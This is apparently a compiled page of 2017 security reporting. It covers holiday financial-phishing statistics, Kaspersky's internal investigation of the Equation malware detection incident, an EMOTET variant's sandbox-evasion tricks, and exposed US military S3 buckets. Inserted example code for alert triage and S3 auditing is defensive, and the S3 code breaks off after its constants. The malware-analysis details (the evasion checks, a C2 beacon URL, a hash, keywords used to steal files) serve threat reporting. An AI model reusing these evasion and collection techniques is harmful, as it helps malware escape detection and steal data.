Data for both 2015 and 2016 shows a clear attack peak on Black Friday, followed by a fall. In 2016 the number of attacks fell by up to 33 per cent between Friday and Saturday, despite Saturday being the second biggest shopping day over the holiday weekend in the U.S.
Financial phishers are exploiting the Black Friday name in their attacks, as well as consumer awareness of, and concerns about online security – disguising their attack messages as security alerts, implications that the user has been hacked, or adding reassuring-sounding security messages.
Phishing – a universal threat
As earlier editions of the Black Friday overview have shown, phishing is one of the most popular ways of stealing personal information, including payment card details and credentials to online banking accounts. The schemes are fairly easy to set up, requiring limited investment and skills – and are mainly reliant on encouraging people to voluntarily part with their personal and financial information.

Originally spread mainly through emails, phishing attacks are now also carried out through website banners and pop-ups, links, instant messaging, SMS, forums, blogs and social media.

Percentage of users on whose computers Kaspersky Lab’s heuristic anti-phishing system was triggered as a proportion of the total number of Kaspersky Lab users in that country, Q1-Q3 2017

Phishing has a global reach. Kaspersky Lab data on attempted attacks shows that in 2017, China, Australia and Brazil were particularly vulnerable, with up to a quarter or more (28 per cent) of users targeted. They were followed by North America, large parts of Western Europe, the Russian Federation, Latin America, India and elsewhere, where up to one in six (17 per cent) were affected.

A new pool for phishers
During the holiday period, consumers can become more exposed online. An onslaught of promotional emails, offers and ads, the pressure to buy gifts, and a growing tendency to use their smartphone for everything can mean that people are browsing and buying through a relatively small screen, often while out and about and surrounded by distractions. Taken together, this can make them easier to mislead and manipulate through social engineering and high quality spoofed web interfaces.

The 2017 Kaspersky Cybersecurity Index shows how important smartphones have become for online banking, payment and retail transactions.

Between the first six months of 2016 and the same period in 2017, online shopping on smartphones increased from 24 per cent to 43 per cent; online banking from 22 per cent to 35 per cent; and the use of online payment systems from 14 per cent to 29 per cent. Further, the use of smartphones to send and receive emails grew from 44 per cent to 59 per cent over the same period.

The Kaspersky Lab phishing data used in this report focuses on the attack rather than the device the messages/links are received or opened on, but the trend towards mobile-first behavior among consumers is creating new opportunities for cybercriminals that they will not hesitate to capitalize on.

Financial phishing on the rise
As more people adopt online payment and shopping, the theft of financial information or credentials to online bank accounts is a growing target. The proportion of phishing attacks focused on financial data has risen steadily over the last few years and now accounts for half of all phishing attacks.

Financial phishing as a share of the overall number of phishing attacks, 2013 – 2017 (to end Q3)

This popularity means that attack levels now remain fairly consistent throughout the year. The gap that previously existed between the number of attacks experienced during the high spending holiday period, and those registered in the rest of the year, seemed to close in 2016.

The proportion of phishing that was financial phishing over the whole year, and during the holiday period

However, when you dig deeper into the data it becomes clear that the holiday season continues to represent a time of significant and greater risk of falling victim to financial phishing – mainly because of clear localized attack peaks, but probably also because of the increased vulnerability of distracted mobile shoppers and the surge of marketing noise.

Types of financial phishing
We define three categories of financial phishing, depending on what is being exploited: online banking, online payment or online shopping. Each type has evolved at a different, and not always consistent, rate over the last few years.

Year  Period     Financial phishing total  Online shop  Online banks  Online payments
2013  Full year  31.45%                    6.51%        22.20%        2.74%
2013  Q4         32.02%                    7.80%        18.76%        5.46%
2014  Full year  28.73%                    7.32%        16.27%        5.14%
2014  Q4         38.49%                    12.63%       17.94%        7.92%
2015  Full year  34.33%                    9.08%        17.45%        7.08%
2015  Q4         43.38%                    12.29%       18.90%        12.19%
2016  Full year  47.48%                    10.41%       25.76%        11.55%
2016  Q4         48.14%                    10.17%       26.35%        11.37%
2017  Q1-Q3      49.77%                    9.98%        24.47%        15.31%
The change in the share of different types of financial phishing in 2013-2017

Attackers follow consumer adoption trends
Data for the first three quarters of 2017 shows a slight drop in all financial phishing categories with the exception of online payment systems.

Looking at the dynamics of Q4 attacks using the names of leading payment systems it is clear that cybercriminals are adapting to reflect the growing use of online payment methods such as PayPal. But overall, there seems to be a disappearance of extremes, with attacks spread more evenly across the different brand names.

The change in the use of online payment system brands in financial phishing attacks, Q4, 2013-2016

Multi-brand retailers remain a top choice for financial phishing
In terms of retail brand, the leading names used by attackers over the last few years have barely changed – but the number of attacks in Q4 using each brand have also become more evenly spread. This could reflect growing consumer adoption of online shopping. Most of the top names supply multiple brands (Amazon, Alibaba, Taobao, eBay).

The change in the use of online retail brands in financial phishing attacks, Q4 2013-2016

In short, financial phishing is no longer focused on one or two brands to the exclusion of all others; the attackers are widening their net – and this has far-reaching security implications. No brand can be assumed to be safe, or even safer.

Further, looking at the daily spread of attacks during the week leading up to Black Friday it can be seen that there are some major red flag days when consumers are more vulnerable than ever.

Black Friday attacks
The following chart shows how the number of financial phishing attacks peaks on Black Friday (November 25 in 2016, and November 27 in 2015), followed by a decline – particularly in 2016, when detected attacks fell by 33 per cent within a day (from around 770,000 to 510,000 detections). Weekends generally see lower levels of attacks and fewer people online, but in the U.S. the day after Black Friday is the second biggest shopping day of the year.

The change in the number of phishing attacks using names of popular retail, banking and payment brands during Black Friday week 2015 and 2016 (data from all Kaspersky Lab security components – heuristic, offline and cloud detections)

Conclusion and advice
The main purpose of the report is to raise awareness of a threat that consumers, retailers, financial services and payments systems may encounter over the holiday season. Cybercriminals out for financial information and account details – and ultimately money – are increasingly adept at hiding in the noise, targeting their attacks and exploiting human emotions, such as fear and desire. For further information and advice, please see the full overview.

Investigation Report for the September 2014 Equation malware detection incident in the US
19.11.2017 Kaspersky Analysis 
Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident
In early October, a story was published by the Wall Street Journal alleging Kaspersky Lab software was used to siphon classified data from an NSA employee’s home computer system. Given that Kaspersky Lab has been at the forefront of fighting cyberespionage and cybercriminal activities on the Internet for over 20 years now, these allegations were treated very seriously. To assist any independent investigators and all the people who have been asking us questions whether those allegations were true, we decided to conduct an internal investigation to attempt to answer a few questions we had related to the article and some others that followed it:

Was our software used outside of its intended functionality to pull classified information from a person’s computer?
When did this incident occur?
Who was this person?
Was there actually classified information found on the system inadvertently?
If classified information was pulled back, what happened to said data after? Was it handled appropriately?
Why was the data pulled back in the first place? Is there evidence this information was passed on to “Russian Hackers” or Russian intelligence?
What types of files were gathered from the supposed system?
Do we have any indication the user was subsequently “hacked” by Russian hackers and data exfiltrated?
Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers’ computers?
Assuming cyberspies were able to see the screens of our analysts, what could they find on it and how could that be interpreted?
Answering these questions with factual information would allow us to provide reasonable materials to the media, as well as show hard evidence on what exactly did or did not occur, which may serve as food for thought for everyone else. To further support the objectivity of the internal investigation, we ran it using multiple analysts of non-Russian origin working outside of Russia, to avoid even potential accusations of influence.

The Wall Street Journal Article
The article published in October laid out some specifics that need to be documented and fact checked. Important bullet points from the article include:

The information “stolen” provides details on how the U.S. penetrates foreign computer networks and defends against cyberattacks.
A National Security Agency contractor removed the highly classified material and put it on his home computer.
The data ended up in the hands of so called “Russian hackers” after the files were detected using Kaspersky Lab software.
The incident occurred in 2015 but wasn’t discovered until spring of last year [2016].
The Kaspersky Lab linked incident predates the arrest last year of another NSA contractor, Harold Martin.
“Hackers” homed in on the machine and stole a large amount of data after seeing what files were detected using Kaspersky data.
Beginning of Search
Having all of the data above, the first step in trying to answer these questions was to attempt to identify the supposed incident. Since events such as what is outlined above only occur very rarely, and we diligently keep the history of all operations, it should be possible to find them in our telemetry archive given the right search parameters.

The first assumption we made during the search was that whatever data was allegedly taken most likely had to do with the so-called Equation Group, since this was the major research in an active stage at the time of the alleged incident, and since the media and some security researchers had highlighted many links between the Equation Group and the NSA. Our Equation signatures are clearly identifiable by their malware family names, which contain words such as “Equestre”, “Equation”, “Grayfish”, “Fanny” and “DoubleFantasy”, given to the different tools inside the intrusion set. Taking this into account, we began running searches in our databases dating back to June 2014 (6 months prior to the year in which the incident allegedly happened) for all alerts matching wildcards such as “HEUR:Trojan.Win32.Equestre.*”. Results came quickly: we had a few test (silent) signatures in place that produced a LARGE number of false positives. This is not unusual in the process of creating quality signatures for a rare piece of malware. To alleviate this, we sorted the results by the count of unique hits and were quickly able to zoom in on some activity that happened in September 2014. It should be noted that this date is technically not within the year in which the incident supposedly happened, but we wanted to be sure to cover all bases, as journalists and sources sometimes don’t have all the details.

Below is a list of all hits in September for “Equestre” signatures, sorted from the fewest hits to the most. You can quickly identify the problem signature(s) mentioned above.

Detection name (silent) Count
HEUR:Trojan.Win32.Equestre.u 1
HEUR:Trojan.Win32.Equestre.gen.422674 3
HEUR:Trojan.Win32.Equestre.gen.422683 3
HEUR:Trojan.Win32.Equestre.gen.427692 3
HEUR:Trojan.Win32.Equestre.gen.427696 4
HEUR:Trojan.Win32.Equestre.gen.446160 6
HEUR:Trojan.Win32.Equestre.gen.446979 7
HEUR:Trojan.Win32.Equestre.g 8
HEUR:Trojan.Win32.Equestre.ab 9
HEUR:Trojan.Win32.Equestre.y 9
HEUR:Trojan.Win32.Equestre.l 9
HEUR:Trojan.Win32.Equestre.ad 9
HEUR:Trojan.Win32.Equestre.t 9
HEUR:Trojan.Win32.Equestre.e 10
HEUR:Trojan.Win32.Equestre.v 14
HEUR:Trojan.Win32.Equestre.gen.427697 18
HEUR:Trojan.Win32.Equestre.gen.424814 18
HEUR:Trojan.Win32.Equestre.s 19
HEUR:Trojan.Win32.Equestre.x 20
HEUR:Trojan.Win32.Equestre.i 24
HEUR:Trojan.Win32.Equestre.p 24
HEUR:Trojan.Win32.Equestre.q 24
HEUR:Trojan.Win32.Equestre.gen.446142 34
HEUR:Trojan.Win32.Equestre.d 39
HEUR:Trojan.Win32.Equestre.j 40
HEUR:Trojan.Win32.Equestre.gen.427734 53
HEUR:Trojan.Win32.Equestre.gen.446149 66
HEUR:Trojan.Win32.Equestre.ag 142
HEUR:Trojan.Win32.Equestre.b 145
HEUR:Trojan.Win32.Equestre.h 310
HEUR:Trojan.Win32.Equestre.gen.422682 737
HEUR:Trojan.Win32.Equestre.z 1389
HEUR:Trojan.Win32.Equestre.af 2733
HEUR:Trojan.Win32.Equestre.c 3792
HEUR:Trojan.Win32.Equestre.m 4061
HEUR:Trojan.Win32.Equestre.k 6720
HEUR:Trojan.Win32.Equestre.exvf.1 6726
HEUR:Trojan.Win32.Equestre.w 6742
HEUR:Trojan.Win32.Equestre.f 9494
HEUR:Trojan.Win32.Equestre.gen.446131 26329
HEUR:Trojan.Win32.Equestre.aa 87527
HEUR:Trojan.Win32.Equestre.gen.447002 547349
HEUR:Trojan.Win32.Equestre.gen.447013 1472919
Taking this list of alerts, we started at the top and worked our way down, investigating each hit as we went to see if there were any indications that it might be related to the incident. Most hits were what you would expect: victims of Equation or false positives. Eventually we arrived at a signature that fired a large number of times in a short time span on one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred to below as “[undisclosed].7z”). Even given the limited understanding of Equation at the time of the research, it would have been clear to our analysts that an archive file firing on these signatures was an anomaly, so we decided to dig further into the alerts on this system to see what might be going on. After analyzing the alerts, it was quickly realized that this system contained not only this archive, but many files, both common and unknown, that indicated this was probably a person related to the malware development. Below is a list of Equation-specific signatures that fired on this system over a period of approximately three months:


In total we detected 37 unique files and 218 detected objects, including executables and archives containing malware associated with the Equation Group. Looking at this metadata during the current investigation, we were tempted to include the full list of detected files and file paths in the current report; however, according to our ethical standards, as well as internal policies, we cannot violate our users’ privacy. This was a hard decision, but should we make an exception once, even for the sake of protecting our own company’s reputation, that would be a step on the route of giving up the privacy and freedom of all people who rely on our products. Unless we receive a legitimate request originating from the owner of that system or a higher legal authority, we cannot release such information.
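The triage described above (sort silent-signature hits from least to most, set aside the noisy test signatures, then look for one system where a signature fires many times in a short span, and for detections on archives rather than bare binaries) can be run over alert telemetry as in this added example. It is not Kaspersky code; the alert rows, host ids, signature-to-file mapping and file paths are constructed for illustration.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed telemetry for illustration only (not Kaspersky data):
# (timestamp, anonymised host id, silent detection name, detected object path).
ALERTS = [
    # A silent test signature firing once each on many unrelated hosts: the classic false positive.
    ("2014-09-03 08:15:02", "host-0001", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    ("2014-09-03 09:41:57", "host-0002", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    ("2014-09-04 11:05:13", "host-0003", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    ("2014-09-05 16:22:40", "host-0004", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    ("2014-09-08 07:58:31", "host-0005", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    ("2014-09-08 12:30:09", "host-0006", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    ("2014-09-09 18:44:26", "host-0007", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    ("2014-09-10 06:12:50", "host-0008", "HEUR:Trojan.Win32.Equestre.gen.447013", r"C:\Windows\System32\drivers\acpi.sys"),
    # A genuine victim: a precise signature firing on one dropped module (constructed file name).
    ("2014-09-09 21:13:45", "host-0017", "HEUR:Trojan.Win32.Equestre.z", r"C:\Windows\System32\sample_module.dll"),
    # A burst on a single host, from a removable drive, including archives: the anomaly worth digging into.
    ("2014-09-11 14:00:05", "host-0042", "HEUR:Trojan.Win32.Equestre.m", r"E:\tools\loader.exe"),
    ("2014-09-11 14:00:41", "host-0042", "HEUR:Trojan.Win32.Equestre.m", r"E:\tools\impl.dll"),
    ("2014-09-11 14:02:12", "host-0042", "HEUR:Trojan.Win32.Equestre.m", r"E:\build\project_a.7z"),
    ("2014-09-11 14:03:57", "host-0042", "HEUR:Trojan.Win32.Equestre.m", r"E:\build\project_b.7z"),
    ("2014-09-11 14:05:30", "host-0042", "HEUR:Trojan.Win32.Equestre.m", r"E:\tools\svc.exe"),
    ("2014-09-11 14:06:30", "host-0042", "HEUR:Trojan.Win32.Equestre.m", r"E:\tools\drv.sys"),
]

ARCHIVE_SUFFIXES = (".7z", ".zip", ".rar", ".iso")


def parse_alerts(rows=ALERTS):
    """Turn the raw rows into (datetime, host, signature, path) tuples."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, sig, path)
            for ts, host, sig, path in rows]


def hits_per_signature(alerts):
    """Hit counts per signature, sorted from least to most, like the table in the report."""
    counts = Counter(sig for _, _, sig, _ in alerts)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def likely_false_positives(alerts, max_hosts=3):
    """A silent signature that fires on many unrelated hosts is a false-positive candidate,
    so it goes back to signature QA rather than onto the incident worklist."""
    hosts = defaultdict(set)
    for _, host, sig, _ in alerts:
        hosts[sig].add(host)
    return sorted(sig for sig, h in hosts.items() if len(h) > max_hosts)


def bursts(alerts, window=timedelta(minutes=10), min_hits=5):
    """(host, signature) pairs with at least min_hits alerts inside a sliding time window:
    one system lighting up many times in a short span is the anomaly the report describes."""
    times = defaultdict(list)
    for ts, host, sig, _ in alerts:
        times[(host, sig)].append(ts)
    found = []
    for key, stamps in times.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= min_hits:
                found.append(key)
                break
    return sorted(found)


def archive_hits(alerts):
    """Detections on containers rather than bare executables; a container alerting on a
    malware signature means the whole container was pulled back, not just one binary."""
    return [(host, sig, path) for _, host, sig, path in alerts
            if path.lower().endswith(ARCHIVE_SUFFIXES)]


def worklist(alerts):
    """Signatures to investigate by hand, least-to-most hits, with FP candidates removed."""
    noisy = set(likely_false_positives(alerts))
    return [sig for sig, _ in hits_per_signature(alerts) if sig not in noisy]


if __name__ == "__main__":
    parsed = parse_alerts()
    for sig, n in hits_per_signature(parsed):
        print(f"{sig:45} {n}")
    print("FP candidates:", likely_false_positives(parsed))
    print("bursts:", bursts(parsed))
    print("archives:", archive_hits(parsed))
```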

The file paths observed from these detections indicated that a developer of Equation had plugged in one or more removable drives, AV signatures fired on some of the executables as well as on archives containing them, and any files detected (including the archives they were contained within) were automatically pulled back. At this point in time, we felt confident we had found the source of the story fed to the Wall Street Journal and others. Since this type of event clearly does not happen often, we believe some dates were mixed up or not clear from the original source of the leak to the media.

Our next task was to try and answer what may have happened to the data that was pulled back. Clearly an archive does not contain only those files that triggered, and more than likely contained a possible treasure trove of data pertaining to the intrusion set. It was soon discovered that the actual archive files themselves appear to have been removed from our storage of samples, while the individual files that triggered the alerts remained.

Upon further inquiry about this event and the missing files, it was later discovered that at the direction of the CEO, the archive file, named “[undisclosed].7z”, was removed from storage. Based on the description from the analyst working on that archive, it contained a collection of executable modules, four documents bearing classification markings, and other files related to the same project. The reason we deleted those files and will delete similar ones in the future is two-fold: first, we don’t need anything other than malware binaries to improve protection of our customers, and secondly, because of concerns regarding the handling of potentially classified materials. Assuming that the markings were real, such information cannot and will not be consumed, not even to produce detection signatures based on descriptions.

This concern was later translated into a policy for all malware analysts, who are required to delete any potentially classified materials that have been accidentally collected during anti-malware research or received from a third party. Again, to restate: to the best of our knowledge, it appears the archive files and documents were removed from our storage, and only individual executable files (malware) that were already detected by our signatures were left in storage. Also, it is very apparent that no documents were actively “detected on” during this process. In other words, the only files that fired on specific Equation signatures were binaries, contained within an archive or outside of it. The documents were inadvertently pulled back because they were contained within the larger archive file that alerted on many Equation signatures. According to security software industry standards, requesting a copy of an archive containing malware is a legitimate request, which often helps security companies locate data containers used by malware droppers (i.e. they can be self-extracting archives or even infected ISO files).

An Interesting Twist
During the investigation, we also discovered a very interesting twist to the story that, to our knowledge, has not been discussed publicly. Since we were attempting to be as thorough as possible, we analyzed EVERY alert ever triggered for the specific system in question and came to a very interesting conclusion. It appears the system was actually compromised by a malicious actor on October 4, 2014 at 23:38 local time, by a piece of malware hidden inside a malicious MS Office ISO, specifically in the “setup.exe” file (md5: a82c0575f214bdc7c8ef5a06116cd2a4 – for detection coverage, see this VirusTotal link).

Looking at the sequence of events and detections on this system, we quickly noticed that the user in question ran the above file with a folder name of “Office-2013-PPVL-x64-en-US-Oct2013.iso”. What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as “kms.exe” (a name of a popular pirated software activation tool), and “kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions”. Kaspersky Lab products detected the malware with the verdict Backdoor.Win32.Mokes.hvl.

At a later time after installation of the supposed MS Office 2013, the antivirus began blocking connections out on a regular basis to the URL “http://xvidmovies[.]in/dir/index.php”. Looking into this domain, we can quickly find other malicious files that beacon to the same URL. It’s important to note that the reason we know the system was beaconing to this URL is because we were actively blocking it as it was a known bad site. This does however indicate the user actively downloaded / installed malware on the same system around the same time frame as our detections on the Equation files.

To install and run this malware, the user must have disabled Kaspersky Lab products on his machine. Our telemetry does not allow us to say when the antivirus was disabled, however, the fact that the malware was later detected as running in the system suggests the antivirus had been disabled or was not running when the malware was run. Executing the malware would not have been possible with the antivirus enabled.

Additionally, there may also have been other malware from different downloads that we were unaware of during this time frame. Below is a complete list of the 121 non-Equation-specific alerts seen on this system over the two-month time span:


At this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:

Q1 – Was our software used outside of its intended functionality to pull classified information from a person’s computer?

A1 – The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.

Q2 – When did this incident occur?

A2 – In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.

Q3 – Who was this person?

A3 – Because our software anonymizes certain aspects of users’ information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.

Q4 – Was there actually classified information found on the system inadvertently?

A4 – What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on Equation-specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.

Q5 – If classified information was pulled back, what happened to said data after? Was it handled appropriately?

A5 – After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. – statistics and some metadata). We cannot assess whether the data was “handled appropriately” (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.

Q6 – Why was the data pulled back in the first place? Is there evidence this information was passed on to “Russian Hackers” or Russian intelligence?

A6 – The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with an appropriate level of encryption, relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.

Q7 – What types of files were gathered from the supposed system?

A7 – Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.

Q8 – Do we have any indication the user was subsequently “hacked” by Russian actors and data exfiltrated?

A8 – Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. We assess this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as “Smoke Bot” or “Smoke Loader”) allegedly created by a Russian hacker in 2011 and made available on Russian underground forums for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com”. We are still working on this and further details on this malware might be made available later as a separate research paper.

Of course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given the system owner’s potential clearance level, the user could have been a prime target of nation states. Adding the user’s apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on the passive consent of the user was deleted from our storage.

Q9 – Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers’ computers?

A9 – Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user’s computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.

In relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.

Q10 – Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?

A10 – We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. However, during this sweep we discovered something interesting in relation to the TeamSpy research that we published earlier (for more details we recommend checking the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string patterns based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning “secret” in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:

These strings had to be located in the body of the malware dump from a sandbox-processed sample. In addition, the malware analyst included another indicator to avoid false positives: a path where the malware dropper stored dropped files, ProgramData\Adobe\AdobeARM.

One could theorize about an intelligence operator monitoring a malware analyst’s work while these strings were being entered during the creation of a signature. We cannot say for sure, but it is a possibility: for an attacker looking for anything that can expose our company from a negative side, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.

Many people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.

A new EMOTET Trojan variant improves evasion techniques
19.11.2017. securityaffairs

Security experts at Trend Micro had recently observed a new variant of the EMOTET banking Trojan that implements new evasion features.
EMOTET, aka Geodo, is linked to the dreaded Dridex and Feodo (Cridex, Bugat) malware families.

In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.

The experts observed a re-emergence in EMOTET activity in September, but the recent attacks present a few significant changes to elude sandbox and malware analysis.

“Based on our findings, EMOTET’s dropper changed from using RunPE to exploiting CreateTimerQueueTimer.” states Trend Micro.

The CreateTimerQueueTimer is a Windows application programming interface (API) that creates a queue for lightweight objects called timers that enable the selection of a callback function at a specified time.

“The original function of the API is to be part of the process chain by creating a timer routine, but here, the callback function of the API becomes EMOTET’s actual payload. EMOTET seems to have traded RunPE for a Windows API because the exploitation of the former has become popular while the latter is lesser known, theoretically making it more difficult to detect by security scanners,” continues Trend Micro.

Other malware already abused this Windows API, such as the Hancitor banking Trojan and VAWTRAK.

The anti-analysis functionality implemented by the latest variant allows it to check whether a scanner is monitoring its activities, in order to evade detection.

CreateTimerQueueTimer allows EMOTET to do this check every 0x3E8 milliseconds (1000 ms): the malware can determine if it runs in a sandbox environment and terminates its process if it does.

“This variant has the ability to check if it’s inside a sandbox environment at the second stage of its payload. The EMOTET loader will not proceed if it sees that it’s running inside a sandbox environment.” continues the analysis.

The dropper checks whether the NetBIOS name is TEQUILABOOMBOOM, checks the UserName, and checks for the presence of specific files on the system.

If it does not have admin privileges, it creates an auto start service to maintain persistence on the infected machine, renames it and starts it, collects system information, encrypts it, and sends it via a POST request to the command and control (C&C) server.

The new EMOTET variant is distributed via phishing messages containing a malicious URL used to drop a weaponized document.

Trend Micro also published the Indicators of Compromise (IoCs) for the latest version of the malware.

Further details on the EMOTET C&C infrastructure were published by the popular security researcher MalwareTech (Marcus Hutchins).

“Using hacked websites to proxy C2 servers has become much more common because it adds a layer of protection preventing researchers from easily finding and shutting down the actual C2 server; furthermore, it’s hard for security companies to flag the servers as malicious when they’re actually legitimate websites which have been running for years, not new servers set up with domains bought the day before.” wrote MalwareTech.

Terabytes of US military social media surveillance miserably left wide open in AWS S3 buckets
19.11.2017. securityaffairs BigBrothers

Three AWS S3 buckets containing dozens of terabytes of data resulting from surveillance of US social media were left wide open online.
It has happened again: three more AWS S3 buckets containing dozens of terabytes of data resulting from surveillance of US social media were left wide open online.

The misconfigured AWS S3 buckets contain social media posts and similar pages that were scraped from around the world by the US military to identify and profile persons of interest.

The huge trove of documents was discovered by the popular data breach hunter Chris Vickery; the three buckets were named centcom-backup, centcom-archive, and pacom-archive.

CENTCOM is the abbreviation for the US Central Command, the US military command that covers the Middle East, North Africa and Central Asia; similarly, PACOM stands for the US Pacific Command, which covers Southern Asia, China and Australasia.

Vickery was conducting an ordinary scan for the word “COM” in publicly accessible S3 buckets when he spotted the unsecured buckets; one of them contained 1.8 billion social media posts resulting from automatic scraping activities conducted over the past eight years up to today. According to Vickery, it mainly contains postings made in central Asia, in many cases comments made by US individuals.

Documents reveal that the archive was collected as part of the US government’s Outpost program, which is a social media monitoring and narrowcasting campaign designed to target youngsters and educate them to despise terrorism.

The archive discovered by Vickery in fact includes the Outpost development and configuration files, as well as Apache Lucene indexes of keywords designed to be used with the open-source search engine Elasticsearch.

“While public information about this firm is scant, an internet search reveals multiple individuals who worked for VendorX describing work building Outpost for CENTCOM and the Defense Department” reads the blog post published by Upguard.


Another folder titled “Coral” likely refers to the US Army’s “Coral Reef” intelligence software.

“This folder contains a directory named “INGEST” that contained all the posts scraped and held in the “centcom-backup” bucket. The Coral Reef program “allows users of intelligence to better understand relationships between persons of interest” as a component of the Distributed Common Ground System-Army (DCGS-A) intelligence suite, “the Army’s primary system for the posting of data, processing of information, and dissemination to all components and echelons of intelligence, surveillance and reconnaissance information about the threats, weather, and terrain” programs. Such a focus on gathering intelligence about “persons of interest” would be even more clear-cut in the other two buckets, starting with “centcom-archive.” continues the post.


The bucket “centcom-archive” contains an impressive volume of internet posts stored in the same XML text file format as seen in “centcom-backup,” at least 1.8 billion such posts are stored here.

“The bucket “centcom-archive” contains more scraped internet posts stored in the same XML text file format as seen in “centcom-backup,” only on a much larger scale: conservatively, at least 1.8 billion such posts are stored here.” states the post.

It is disturbing that this material was leaked online due to misconfigured AWS S3 buckets: foreign governments and terrorist organizations may have had access to the archive just as Vickery did.

Vickery notified the American military about the discovery and the buckets have now been locked down and hidden.

It isn’t the first time that data from the US Military has been discovered online; in September, researchers from the cybersecurity firm UpGuard discovered thousands of files containing personal data on former US military, intelligence, and government workers that had allegedly been exposed online for months.
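The misconfiguration behind this story is a bucket that is readable by anyone on the internet. As an added example (not code from UpGuard or from the article), here is an offline check that evaluates the three things that make an S3 bucket public (an Allow statement for an anonymous principal in the bucket policy, an ACL grant to the AllUsers/AuthenticatedUsers groups, and an incomplete Block Public Access configuration), run over a constructed weak configuration and its corrected counterpart; the bucket name, account id and role name are placeholders, and treating any Condition as "restricted" is a simplification of AWS's own public-bucket test.

```python
import json

# Anonymous principals in policies, and the ACL groups that make a bucket world-readable.
ANONYMOUS_PRINCIPALS = {"*"}
PUBLIC_ACL_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


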